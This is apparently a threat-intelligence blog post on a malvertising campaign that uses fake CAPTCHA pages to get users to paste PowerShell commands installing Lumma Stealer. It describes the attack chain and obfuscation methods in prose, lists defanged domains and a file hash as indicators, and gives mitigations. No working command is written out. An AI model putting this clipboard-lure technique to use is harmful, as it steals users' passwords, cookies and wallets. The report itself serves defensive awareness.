Malware

Cybercriminals Leverage Fake CAPTCHAs for Malware Delivery

Cybersec Sentinel

Dec 18, 2024 • 3 min read

Threat Group: Unknown
Threat Type: Malvertising, Phishing
Exploited Vulnerabilities: Social Engineering, Malvertising Networks
Malware Used: Lumma Stealer
Threat Score: High (8.5/10) – Due to its widespread reach, advanced obfuscation techniques, and ability to harvest sensitive data.
Last Threat Observation: December 2024 (Multiple Security Sources)

Overview

Cybercriminals are increasingly exploiting fake CAPTCHA verification pages to distribute malware, notably the Lumma Stealer, through large-scale malvertising campaigns. These deceptive tactics manipulate users into executing malicious scripts under the guise of verifying their humanity, leading to unauthorized access to sensitive information. The campaign, identified as "DeceptionAds," leverages ad networks to propagate over a million ad impressions daily across thousands of websites, significantly amplifying its reach and potential impact.

The attack chain typically begins with users clicking on malicious advertisements or links, redirecting them to counterfeit CAPTCHA pages. These pages prompt users to perform actions such as copying and executing a PowerShell command, which, unbeknownst to them, initiates the download and installation of the Lumma Stealer malware. Once installed, Lumma Stealer harvests browser-stored passwords, cookies, cryptocurrency wallet credentials, and other sensitive data. The malware's distribution through seemingly legitimate ad networks and its sophisticated obfuscation techniques make detection and prevention particularly challenging, underscoring the need for heightened vigilance and robust cybersecurity measures.

Key Details

Delivery Method:

Users encounter fake CAPTCHA pages through malicious ads, phishing emails, or links associated with pirated software.
Fake CAPTCHAs prompt users to execute malicious scripts disguised as legitimate verification actions.

Target:

Individuals seeking free or pirated content.
Developers receiving phishing emails targeting platforms like GitHub.

Functions:

Credential Harvesting: Extracts browser-stored passwords, cookies, and cryptocurrency wallet credentials.
Data Collection: Captures autofill form data, including credit card information.
2FA Token Theft: Gathers Two-Factor Authentication (2FA) tokens and backup codes.
Malware Deployment: Acts as a loader for additional malware payloads.
Persistence Mechanisms: Establishes persistence through scheduled tasks and startup modifications.

Obfuscation:

Script Encoding: Uses Base64 and other encoding methods.
Trusted Utility Abuse: Leverages legitimate Windows utilities like mshta.exe to bypass detection.
Dynamic Loading: Fetches and executes payloads on demand to avoid static analysis.

Attack Vectors

Malvertising:
- Users clicking on malicious ads are redirected to fake CAPTCHA pages.
- Upon interacting, a PowerShell script is copied to the clipboard, which downloads and installs Lumma Stealer.
Phishing Emails:
- Targets receive phishing emails impersonating trusted services (e.g., GitHub).
- These emails direct users to fake CAPTCHA pages deploying similar clipboard-based malware installation techniques.

Known Indicators of Compromise (IoCs)

FileHash-MD5:

7a0525921ff54f1193db83d7303c6ee8

Domains:

chromeupdates[.]com
adstrails[.]com
boltsreach[.]com
cdn-downloads-now[.]xyz
cloud-checked[.]com
clovixo[.]com
fiare-activity[.]com
fingerboarding[.]com
foodrailway[.]cfd
freeofapps[.]com
gawanjaneto[.]com
getcodavbiz[.]com
glidronix[.]com
impressflow[.]com
insigelo[.]com
latestgadet[.]com
marimarbahamas[.]me
mediamanagerverif[.]com
mytecbiz[.]org
nettrilo[.]com
nowuseemi[.]com
offerzforu[.]com
offerztodayforu[.]com
privatemeld[.]com
privatox[.]com
reachorax[.]com
regsigara[.]com
restoindia[.]me
satisfiedweb[.]com
secureporter[.]com
servinglane[.]com
sheenglathora[.]com
spotconningo[.]com
startingdestine[.]com
stephighs[.]com
streamingszone[.]com
tagsflare[.]com
taketheright[.]com
techstalone[.]com
tracksvista[.]com
trailsift[.]com
travelwithandrew[.]xyz
tunneloid[.]com
vanshitref[.]com
verticbuzz[.]com
westreamdaily[.]com
yourtruelover[.]com

Hostnames:

bmy7etxgksxo[.]objectstorage[.]sa-santiago-1[.]oci[.]customer-oci[.]com
sos-ch-gva-2[.]sos-cdn[.]net
xxxx[.]bmtrck[.]com

Mitigation and Prevention

User Awareness: Educate users on the risks of executing scripts from untrusted sources.
Email Filtering: Implement robust email filters to block phishing attempts.
Antivirus Protection: Keep antivirus software updated to detect malware like Lumma Stealer.
Two-Factor Authentication (2FA): Enforce 2FA to add security layers.
Monitor Logs: Regularly review system and network logs for unusual activities.
Regular Updates: Keep software and systems patched against vulnerabilities.

Risk Assessment

The fake CAPTCHA campaign presents a significant threat due to its deceptive nature, exploiting user trust in standard web security procedures. The campaign’s scale, with millions of daily ad impressions across thousands of sites, highlights its potential for causing extensive data breaches and financial losses.

Conclusion

To counter the growing threat posed by fake CAPTCHA campaigns, organizations must adopt a proactive cybersecurity approach. This includes deploying advanced threat detection systems, conducting regular employee awareness training, and enforcing multi-layered security protocols. Additionally, maintaining up-to-date threat intelligence and sharing information with industry peers can bolster collective defense efforts. By staying ahead of evolving cyber tactics, businesses can better safeguard their digital assets and reduce the likelihood of successful attacks.

Sources:

BleepingComputer - Malicious ads push Lumma infostealer via fake CAPTCHA pages
Infosecurity Magazine - Fake Captcha Campaign Highlights Risks of Malvertising Networks
The Hacker News - DeceptionAds Delivers 1M+ Daily Impressions via 3,000 Sites
Alienvault - Indicators of Compromise